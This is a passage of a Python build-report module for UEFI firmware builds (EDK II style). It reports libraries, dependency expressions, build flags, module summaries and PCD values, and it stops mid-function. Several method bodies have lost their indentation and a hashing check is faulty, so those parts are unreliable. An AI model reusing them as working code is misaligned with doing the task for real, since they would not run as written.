                # A fixed VOID* PCD holding 16 comma-separated bytes is
                # GUID-valued; index it under its PCD name as well.
                for Pcd in Ma.FixedVoidTypePcds:
                    PcdValue = Ma.FixedVoidTypePcds[Pcd]
                    if len(PcdValue.split(',')) == 16:
                        GuidValue = GuidStructureByteArrayToGuidString(PcdValue)
                        self._GuidDb[GuidValue.upper()] = Pcd

    def ParseDepexFile(self, DepexFileName):
        """Decode the binary depex file DepexFileName into a list of
        readable instruction strings."""
        DepexFile = open(DepexFileName, "rb")
        DepexStatement = []
        OpCode = DepexFile.read(1)
        while OpCode:
            Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
            if Statement in ("BEFORE", "AFTER", "PUSH"):
                # These opcodes are followed by a 16-byte GUID operand;
                # render it and substitute the declared name when known.
                GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
                            struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
                Statement = "%s %s" % (Statement, self._GuidDb.get(GuidValue, GuidValue))
            DepexStatement.append(Statement)
            OpCode = DepexFile.read(1)
        return DepexStatement
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
    """Reports the module library subsection in the build report file."""

    ##
    # Constructor function for class LibraryReport
    #
    # Collects (INF path, library class, constructors, destructors, depex,
    # build time) for every library the module depends on.
    #
    # @param self            The object pointer
    # @param M               Module context information
    #
    def __init__(self, M):
        self.LibraryList = []
        for Lib in M.DependentLibraryList:
            LibInfPath = str(Lib)
            LibClassList = Lib.LibraryClass[0].LibraryClass
            LibConstructorList = Lib.ConstructorList
            LibDesstructorList = Lib.DestructorList
            LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
            # Default to "" so a library with no matching autogen entry does
            # not leave LibTime unbound (NameError) or silently inherit the
            # previous library's build time.
            LibTime = ""
            for LibAutoGen in M.LibraryAutoGenList:
                if LibInfPath == LibAutoGen.MetaFile.Path:
                    LibTime = LibAutoGen.BuildTime
                    break
            self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime))

    ##
    # Generate report for module library information
    #
    # Writes one entry per library; for EDKII-style libraries the class,
    # constructor/destructor, depex and build time are appended.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    #
    def GenerateReport(self, File):
        if len(self.LibraryList) > 0:
            FileWrite(File, gSubSectionStart)
            FileWrite(File, TAB_BRG_LIBRARY)
            FileWrite(File, gSubSectionSep)
            for LibraryItem in self.LibraryList:
                LibInfPath = LibraryItem[0]
                FileWrite(File, LibInfPath)
                LibClass = LibraryItem[1]
                EdkIILibInfo = ""
                LibConstructor = " ".join(LibraryItem[2])
                if LibConstructor:
                    EdkIILibInfo += " C = " + LibConstructor
                LibDestructor = " ".join(LibraryItem[3])
                if LibDestructor:
                    EdkIILibInfo += " D = " + LibDestructor
                LibDepex = " ".join(LibraryItem[4])
                if LibDepex:
                    EdkIILibInfo += " Depex = " + LibDepex
                if LibraryItem[5]:
                    EdkIILibInfo += " Time = " + LibraryItem[5]
                if EdkIILibInfo:
                    FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
                else:
                    FileWrite(File, "{%s}" % LibClass)
            FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
    ##
    # Constructor function for class DepexReport
    #
    # This constructor function generates DepexReport object for
    # a module. If the module source contains the DXS file (usually EDK
    # style module), it uses the dependency in DXS file; otherwise,
    # it uses the dependency expression from its own INF [Depex] section
    # and then merges with the ones from its dependent library INF.
    #
    # @param self            The object pointer
    # @param M               Module context information
    #
    def __init__(self, M):
        self.Depex = ""
        self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
        ModuleType = M.ModuleType
        if not ModuleType:
            ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
        # Core/application module types carry no dependency expression;
        # leave self.Depex empty so GenerateReport emits nothing.
        if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
            return
        # for/else: the else branch runs only when no .dxs file produced a
        # match (i.e. the loop completed without `break`).
        for Source in M.SourceFileList:
            if os.path.splitext(Source.Path)[1].lower() == ".dxs":
                Match = gDxsDependencyPattern.search(open(Source.Path).read())
                if Match:
                    self.Depex = Match.group(1).strip()
                    self.Source = "DXS"
                    break
        else:
            self.Depex = M.DepexExpressionDict.get(M.ModuleType, "")
            self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
            if not self.ModuleDepex:
                self.ModuleDepex = "(None)"
            LibDepexList = []
            for Lib in M.DependentLibraryList:
                LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
                if LibDepex != "":
                    LibDepexList.append("(" + LibDepex + ")")
            # Library depex terms are ANDed together per the PI depex semantics.
            self.LibraryDepex = " AND ".join(LibDepexList)
            if not self.LibraryDepex:
                self.LibraryDepex = "(None)"
            self.Source = "INF"
    ##
    # Generate report for module dependency expression information
    #
    # This function generates report for the module dependency expression.
    #
    # @param self              The object pointer
    # @param File              The file object for report
    # @param GlobalDepexParser The platform global Dependency expression parser object
    #
    def GenerateReport(self, File, GlobalDepexParser):
        if not self.Depex:
            return
        FileWrite(File, gSubSectionStart)
        # When the compiled .depex binary exists, decode and list its
        # final instruction stream first.
        if os.path.isfile(self._DepexFileName):
            try:
                DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
                FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
                for DepexStatement in DepexStatements:
                    FileWrite(File, " %s" % DepexStatement)
                FileWrite(File, gSubSectionSep)
            except:
                EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
        FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
        if self.Source == "INF":
            FileWrite(File, self.Depex, True)
            FileWrite(File, gSubSectionSep)
            FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
            FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
        else:
            FileWrite(File, self.Depex)
        FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
    """Reports the module build flags subsection: the tool chain tag plus the
    flags of every tool actually used by the module's source files."""

    def __init__(self, M):
        """Derive the relevant tool set from the module's source extensions
        and capture the corresponding *_FLAGS build options from M."""
        # Map each recognized source extension to the tools it involves, so
        # irrelevant tool flags are filtered out of the report.
        ExtToolMap = {
            ".c": ("CC",), ".cc": ("CC",), ".cpp": ("CC",),
            ".s": ("PP", "ASM"), ".asm": ("PP", "ASM"),
            ".vfr": ("VFRPP", "VFR"),
            ".dxs": ("APP", "CC"),
            ".asl": ("ASLPP", "ASL"),
            ".aslc": ("ASLCC", "ASLDLINK", "CC"),
            ".asm16": ("ASMLINK", "SLINK", "DLINK"),
        }
        BuildOptions = {}
        for Source in M.SourceFileList:
            Ext = os.path.splitext(Source.File)[1].lower()
            for Tool in ExtToolMap.get(Ext, ()):
                BuildOptions[Tool] = 1
        # Save module build flags.
        self.ToolChainTag = M.ToolChain
        self.BuildFlags = {
            Tool + "_FLAGS": M.BuildOption.get(Tool, {}).get("FLAGS", "")
            for Tool in BuildOptions
        }

    def GenerateReport(self, File):
        """Write the build flags subsection into the report File object."""
        FileWrite(File, gSubSectionStart)
        FileWrite(File, "Build Flags")
        FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
        for Tool, Flags in self.BuildFlags.items():
            FileWrite(File, gSubSectionSep)
            FileWrite(File, "%s = %s" % (Tool, Flags), True)
        FileWrite(File, gSubSectionEnd)
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises of module summary, module PCD, library, dependency expression,
# build flags sections.
#
class ModuleReport(object):
##
# Constructor function for class ModuleReport
#
# This constructor function generates ModuleReport object for
# a separate module in a platform build.
#
# @param self The object pointer
# @param M Module context information
# @param ReportType The kind of report items in the final report file
#
    def __init__(self, M, ReportType):
        """Collect identity, type, PCD, library, depex and build-flag data
        for module M; ReportType selects which optional sub-reports to build."""
        self.ModuleName = M.Module.BaseName
        self.ModuleInfPath = M.MetaFile.File
        self.ModuleArch = M.Arch
        self.FileGuid = M.Guid
        self.Size = 0
        self.BuildTimeStamp = None
        self.Hash = 0
        self.DriverType = ""
        # Only non-library modules carry a firmware driver type.
        if not M.IsLibrary:
            ModuleType = M.ModuleType
            if not ModuleType:
                ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
            #
            # If a module complies to PI 1.1, promote Module type to "SMM_DRIVER"
            #
            if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
                PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
                # 0x0001000A is PI spec version 1.10 (i.e. PI 1.1 or later).
                if int(PiSpec, 0) >= 0x0001000A:
                    ModuleType = "SMM_DRIVER"
            self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
        self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
        self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
        self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
        self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
        self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
        self.BuildTime = M.BuildTime
        self._BuildDir = M.BuildDir
        self.ModulePcdSet = {}
        if "PCD" in ReportType:
            #
            # Collect all module used PCD set: module INF referenced directly or indirectly.
            # It also saves module INF default values of them in case they exist.
            #
            for Pcd in M.ModulePcdList + M.LibraryPcdList:
                self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
        self.LibraryReport = None
        if "LIBRARY" in ReportType:
            self.LibraryReport = LibraryReport(M)
        self.DepexReport = None
        if "DEPEX" in ReportType:
            self.DepexReport = DepexReport(M)
        # NOTE(review): BuildFlagsReport attribute exists only when requested,
        # unlike LibraryReport/DepexReport which default to None.
        if "BUILD_FLAGS" in ReportType:
            self.BuildFlagsReport = BuildFlagsReport(M)
##
# Generate report for module information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalPcdReport The platform global PCD report object
# @param GlobalPredictionReport The platform global Prediction report object
# @param GlobalDepexParser The platform global Dependency expression parser object
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
FileWrite(File, gSectionStart)
FwReportFileName = os.path.join(self._BuildDir, "OUTPUT", self.ModuleName + ".txt")
if os.path.isfile(FwReportFileName):
try:
FileContents = open(FwReportFileName).read()
Match = gModuleSizePattern.search(FileContents)
if Match:
self.Size = int(Match.group(1))
Match = gTimeStampPattern.search(FileContents)
if Match:
self.BuildTimeStamp = datetime.utcfromtimestamp(int(Match.group(1)))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
if "HASH" in ReportType:
OutputDir = os.path.join(self._BuildDir, "OUTPUT")
DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
if os.path.isfile(DefaultEFIfile):
Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
# rebase the efi image since its base address may not zero
cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
try:
PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception as X:
EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
EndOfProcedure = threading.Event()
EndOfProcedure.clear()
if PopenObject.stderr:
StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
PopenObject.wait()
if PopenObject.stderr:
StdErrThread.join()
if PopenObject.returncode != 0:
EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
if os.path.isfile(Tempfile):
self.Hash = hashlib.sha1()
buf = open(Tempfile, 'rb').read()
if self.Hash.update(buf):
self.Hash = self.Hash.update(buf)
self.Hash = self.Hash.hexdigest()
os.remove(Tempfile)
FileWrite(File, "Module Summary")
FileWrite(File, "Module Name: %s" % self.ModuleName)
FileWrite(File, "Module Arch: %s" % self.ModuleArch)
FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
FileWrite(File, "File GUID: %s" % self.FileGuid)
if self.Size:
FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
if self.Hash:
FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
if self.BuildTimeStamp:
FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
if self.BuildTime:
FileWrite(File, "Module Build Time: %s" % self.BuildTime)
if self.DriverType:
FileWrite(File, "Driver Type: %s" % self.DriverType)
if self.UefiSpecVersion:
FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
if self.PiSpecVersion:
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
if self.PciDeviceId:
FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
if self.PciVendorId:
FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
if self.PciClassCode:
FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
FileWrite(File, gSectionSep)
if "PCD" in ReportType:
GlobalPcdReport.GenerateReport(File, self.ModulePcdSet,self.FileGuid)
if "LIBRARY" in ReportType:
self.LibraryReport.GenerateReport(File)
if "DEPEX" in ReportType:
self.DepexReport.GenerateReport(File, GlobalDepexParser)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport.GenerateReport(File)
if "FIXED_ADDRESS" in ReportType and self.FileGuid:
GlobalPredictionReport.GenerateReport(File, self.FileGuid)
FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
    """Forward lines from a byte stream to a consumer until EOF or stop request.

    Reads *From* one line at a time, strips the trailing newline, decodes as
    UTF-8 (ignoring undecodable bytes) and passes the result to callable *To*.
    Stops at end of stream (empty read) or once *ExitFlag* is set.

    @param From      Readable binary stream (e.g. a subprocess pipe)
    @param To        Callable accepting one decoded line (e.g. a logger method)
    @param ExitFlag  threading.Event used to request early termination
    """
    while True:
        # read one line a time
        Line = From.readline()
        # readline() returns b"" (never None) at end of stream
        if not Line:
            break
        To(Line.rstrip().decode(encoding='utf-8', errors='ignore'))
        # is_set() replaces the deprecated isSet() alias
        if ExitFlag.is_set():
            break
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
# This constructor function generates PcdReport object a platform build.
# It collects the whole PCD database from platform DSC files, platform
# flash description file and package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
    def __init__(self, Wa):
        """Collect the whole PCD database for a platform build.

        Gathers PCDs referenced by modules, PCDs declared in DSC/FDF but unused,
        PCDs appearing in conditional directives, per-module overrides, and the
        DEC/DSC default values, from the workspace autogen context *Wa*.

        @param self   The object pointer
        @param Wa     Workspace context information
        """
        # {TokenSpaceGuidCName: {PcdType: [Pcd, ...]}} for all referenced PCDs.
        self.AllPcds = {}
        # Same shape, for PCDs declared but not consumed by any module.
        self.UnusedPcds = {}
        # Same shape, for PCDs used in build-system conditional directives.
        self.ConditionalPcds = {}
        # Longest token C name seen; drives column alignment in the report.
        self.MaxLen = 0
        self.Arch = None
        if Wa.FdfProfile:
            self.FdfPcdSet = Wa.FdfProfile.PcdDict
        else:
            self.FdfPcdSet = {}
        # Single default-store / single SKU builds get a more compact layout.
        self.DefaultStoreSingle = True
        self.SkuSingle = True
        if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
            self.DefaultStoreSingle = False
        if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
            self.SkuSingle = False
        # {(TokenCName, TokenSpaceGuid): {module INF basename: override value}}
        self.ModulePcdOverride = {}
        for Pa in Wa.AutoGenObjectList:
            # NOTE(review): self.Arch keeps only the LAST arch in the list —
            # presumably single-arch report context; confirm for multi-arch builds.
            self.Arch = Pa.Arch
            #
            # Collect all platform referenced PCDs and grouped them by PCD token space
            # GUID C Names
            #
            for Pcd in Pa.AllPcdList:
                PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                if Pcd not in PcdList:
                    PcdList.append(Pcd)
                if len(Pcd.TokenCName) > self.MaxLen:
                    self.MaxLen = len(Pcd.TokenCName)
            #
            # Collect the PCD defined in DSC/FDF file, but not used in module
            #
            UnusedPcdFullList = []
            StructPcdDict = GlobalData.gStructurePcd.get(self.Arch, collections.OrderedDict())
            for Name, Guid in StructPcdDict:
                if (Name, Guid) not in Pa.Platform.Pcds:
                    Pcd = StructPcdDict[(Name, Guid)]
                    PcdList = self.AllPcds.setdefault(Guid, {}).setdefault(Pcd.Type, [])
                    if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
                        UnusedPcdFullList.append(Pcd)
            for item in Pa.Platform.Pcds:
                Pcd = Pa.Platform.Pcds[item]
                if not Pcd.Type:
                    # check the Pcd in FDF file, whether it is used in module first
                    for T in PCD_TYPE_LIST:
                        PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
                        if Pcd in PcdList:
                            Pcd.Type = T
                            break
                if not Pcd.Type:
                    # Fall back to the type declared in one of the package DEC files.
                    PcdTypeFlag = False
                    for package in Pa.PackageList:
                        for T in PCD_TYPE_LIST:
                            if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
                                Pcd.Type = T
                                PcdTypeFlag = True
                                if not Pcd.DatumType:
                                    Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
                                break
                        if PcdTypeFlag:
                            break
                if not Pcd.DatumType:
                    PcdType = Pcd.Type
                    # Try to remove Hii and Vpd suffix
                    if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
                        PcdType = TAB_PCDS_DYNAMIC_EX
                    elif PcdType.startswith(TAB_PCDS_DYNAMIC):
                        PcdType = TAB_PCDS_DYNAMIC
                    for package in Pa.PackageList:
                        if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
                            Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
                            break
                PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                UnusedPcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                # A PCD referenced by any module is no longer "unused".
                if Pcd in UnusedPcdList:
                    UnusedPcdList.remove(Pcd)
                if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
                    UnusedPcdFullList.append(Pcd)
                if len(Pcd.TokenCName) > self.MaxLen:
                    self.MaxLen = len(Pcd.TokenCName)
            if GlobalData.gConditionalPcds:
                for PcdItem in GlobalData.gConditionalPcds:
                    if '.' in PcdItem:
                        (TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
                        if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
                            Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
                            PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                            if Pcd not in PcdList:
                                PcdList.append(Pcd)
            # PCDs that appear in conditional directives are reported there,
            # not in the unused section.
            UnusedPcdList = []
            if UnusedPcdFullList:
                for Pcd in UnusedPcdFullList:
                    if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
                        continue
                    UnusedPcdList.append(Pcd)
            for Pcd in UnusedPcdList:
                PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                if Pcd not in PcdList:
                    PcdList.append(Pcd)
            for Module in Pa.Platform.Modules.values():
                #
                # Collect module override PCDs
                #
                for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList:
                    TokenCName = ModulePcd.TokenCName
                    TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
                    ModuleDefault = ModulePcd.DefaultValue
                    ModulePath = os.path.basename(Module.M.MetaFile.File)
                    self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
        #
        # Collect PCD DEC default value.
        #
        self.DecPcdDefault = {}
        self._GuidDict = {}
        for Pa in Wa.AutoGenObjectList:
            for Package in Pa.PackageList:
                Guids = Package.Guids
                self._GuidDict.update(Guids)
                for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
                    DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
                    # setdefault: first package declaring the PCD wins.
                    self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
        #
        # Collect PCDs defined in DSC common section
        #
        self.DscPcdDefault = {}
        for Pa in Wa.AutoGenObjectList:
            for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
                DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
                if DscDefaultValue:
                    self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet,ModuleGuid=None):
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
IsEmpty = True
for Token in self.UnusedPcds:
TokenDict = self.UnusedPcds[Token]
for Type in TokenDict:
if TokenDict[Type]:
IsEmpty = False
break
if not IsEmpty:
break
if not IsEmpty:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet,ModuleGuid = ModuleGuid)
##
# Generate report for PCD information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
# @param ReportySubType 0 means platform/module PCD report, 1 means Conditional
# directives section report, 2 means Unused Pcds section report
# @param DscOverridePcds Module DSC override PCDs set
#
    def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0,ModuleGuid=None):
        """Write one PCD report section, grouped by token-space GUID.

        @param self          The object pointer
        @param File          The file object for report
        @param ModulePcdSet  Set of all PCDs referenced by module or None for
                             platform PCD report
        @param ReportSubType 0 means platform/module PCD report, 1 means
                             Conditional directives section report, 2 means
                             Unused Pcds section report
        @param ModuleGuid    GUID of the module (with '-' replaced by 'S' when
                             used as a dictionary key below)
        """
        # Select which of the three PCD maps this section reports on.
        PcdDict = self.AllPcds
        if ReportSubType == 1:
            PcdDict = self.ConditionalPcds
        elif ReportSubType == 2:
            PcdDict = self.UnusedPcds
        if not ModulePcdSet:
            # Platform-level section header and override-flag legend.
            FileWrite(File, gSectionStart)
            if ReportSubType == 1:
                FileWrite(File, "Conditional Directives used by the build system")
            elif ReportSubType == 2:
                FileWrite(File, "PCDs not used by modules or in conditional directives")
            else:
                FileWrite(File, "Platform Configuration Database Report")
            FileWrite(File, " *B - PCD override in the build option")
            FileWrite(File, " *P - Platform scoped PCD override in DSC file")
            FileWrite(File, " *F - Platform scoped PCD override in FDF file")
            if not ReportSubType:
                FileWrite(File, " *M - Module scoped PCD override")
            FileWrite(File, gSectionSep)
        else:
            if not ReportSubType and ModulePcdSet:
                #
                # For module PCD sub-section
                #
                FileWrite(File, gSubSectionStart)
                FileWrite(File, TAB_BRG_PCD)
                FileWrite(File, gSubSectionSep)
        # Flatten to {TokenSpaceGuid: {(TokenCName, Type): Pcd}} for sorting.
        AllPcdDict = {}
        for Key in PcdDict:
            AllPcdDict[Key] = {}
            for Type in PcdDict[Key]:
                for Pcd in PcdDict[Key][Type]:
                    AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
        for Key in sorted(AllPcdDict):
            #
            # Group PCD by their token space GUID C Name
            #
            First = True
            for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
                #
                # Group PCD by their usage type
                #
                Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
                TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
                MixedPcdFlag = False
                if GlobalData.MixedPcd:
                    # A "mixed" PCD is reported under its original (shared) name.
                    for PcdKey in GlobalData.MixedPcd:
                        if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
                            PcdTokenCName = PcdKey[0]
                            MixedPcdFlag = True
                    if MixedPcdFlag and not ModulePcdSet:
                        continue
                #
                # Get PCD default value and their override relationship
                #
                DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
                DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
                DscDefaultValBak = DscDefaultValue
                # NOTE(review): Field is intentionally left bound by this loop and
                # reused in the *F/*P decision far below — confirm before refactoring.
                Field = ''
                for (CName, Guid, Field) in self.FdfPcdSet:
                    if CName == PcdTokenCName and Guid == Key:
                        DscDefaultValue = self.FdfPcdSet[(CName, Guid, Field)]
                        break
                if DscDefaultValue != DscDefaultValBak:
                    try:
                        # Evaluate the FDF-supplied expression to a concrete value.
                        DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
                    except BadExpression as DscDefaultValue:
                        EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
                InfDefaultValue = None
                # Effective value: DEC default, overridden by DSC/FDF when present.
                PcdValue = DecDefaultValue
                if DscDefaultValue:
                    PcdValue = DscDefaultValue
                #The DefaultValue of StructurePcd already be the latest, no need to update.
                if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
                    Pcd.DefaultValue = PcdValue
                PcdComponentValue = None
                if ModulePcdSet is not None:
                    if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
                        continue
                    InfDefaultValue, PcdComponentValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
                    PcdValue = PcdComponentValue
                    #The DefaultValue of StructurePcd already be the latest, no need to update.
                    if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
                        Pcd.DefaultValue = PcdValue
                    if InfDefaultValue:
                        try:
                            InfDefaultValue = ValueExpressionEx(InfDefaultValue, Pcd.DatumType, self._GuidDict)(True)
                        except BadExpression as InfDefaultValue:
                            EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" % (InfDefaultValue, Pcd.DatumType))
                    if InfDefaultValue == "":
                        InfDefaultValue = None
                # Command-line (--pcd) overrides beat everything else.
                BuildOptionMatch = False
                if GlobalData.BuildOptionPcd:
                    for pcd in GlobalData.BuildOptionPcd:
                        if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
                            if pcd[2]:
                                continue
                            PcdValue = pcd[3]
                            #The DefaultValue of StructurePcd already be the latest, no need to update.
                            if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
                                Pcd.DefaultValue = PcdValue
                            BuildOptionMatch = True
                            break
                if First:
                    # Print the token-space GUID once per group.
                    if ModulePcdSet is None:
                        FileWrite(File, "")
                    FileWrite(File, Key)
                    First = False
                # Decide which source (DEC/INF/DSC) the effective value matches.
                # Numeric PCDs compare as integers; others compare as strings.
                if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
                    # Strip leading zeros so int(x, 0) does not treat the value
                    # as octal / reject it.
                    if PcdValue.startswith('0') and not PcdValue.lower().startswith('0x') and \
                            len(PcdValue) > 1 and PcdValue.lstrip('0'):
                        PcdValue = PcdValue.lstrip('0')
                    PcdValueNumber = int(PcdValue.strip(), 0)
                    if DecDefaultValue is None:
                        DecMatch = True
                    else:
                        if DecDefaultValue.startswith('0') and not DecDefaultValue.lower().startswith('0x') and \
                                len(DecDefaultValue) > 1 and DecDefaultValue.lstrip('0'):
                            DecDefaultValue = DecDefaultValue.lstrip('0')
                        DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
                        DecMatch = (DecDefaultValueNumber == PcdValueNumber)
                    if InfDefaultValue is None:
                        InfMatch = True
                    else:
                        if InfDefaultValue.startswith('0') and not InfDefaultValue.lower().startswith('0x') and \
                                len(InfDefaultValue) > 1 and InfDefaultValue.lstrip('0'):
                            InfDefaultValue = InfDefaultValue.lstrip('0')
                        InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
                        InfMatch = (InfDefaultValueNumber == PcdValueNumber)
                    if DscDefaultValue is None:
                        DscMatch = True
                    else:
                        if DscDefaultValue.startswith('0') and not DscDefaultValue.lower().startswith('0x') and \
                                len(DscDefaultValue) > 1 and DscDefaultValue.lstrip('0'):
                            DscDefaultValue = DscDefaultValue.lstrip('0')
                        DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
